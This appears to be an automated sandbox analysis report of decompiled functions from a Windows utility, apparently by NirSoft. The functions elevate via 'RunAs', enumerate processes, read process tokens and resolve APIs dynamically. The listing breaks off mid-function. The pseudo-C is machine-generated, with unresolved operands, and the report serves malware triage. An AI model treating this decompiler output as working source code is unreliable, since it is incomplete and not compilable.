Version, xrefs: 00406536
TranslatorName, xrefs: 0040650F
SFM, xrefs: 00406502
strings, xrefs: 00406574
RTL, xrefs: 00406549

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNEL32 ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

/SpecialRun %I64x %d, xrefs: 00401C84
RunAs, xrefs: 00401CC0
@, xrefs: 00401CC7
<, xrefs: 00401CB9

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51
Y@, xrefs: 00409BA9

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleInformation, xrefs: 004091DC
GetModuleFileNameExW, xrefs: 004091BA
psapi.dll, xrefs: 00409180
GetModuleBaseNameW, xrefs: 00409198
EnumProcessModules, xrefs: 004091A9
EnumProcesses, xrefs: 004091CB

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

CreateToolhelp32Snapshot, xrefs: 00409110
Module32First, xrefs: 00409121
Module32Next, xrefs: 00409132
Process32Next, xrefs: 00409154
kernel32.dll, xrefs: 004090F8
Process32First, xrefs: 00409143

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<table dir="rtl"><tr><td>, xrefs: 00408284
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
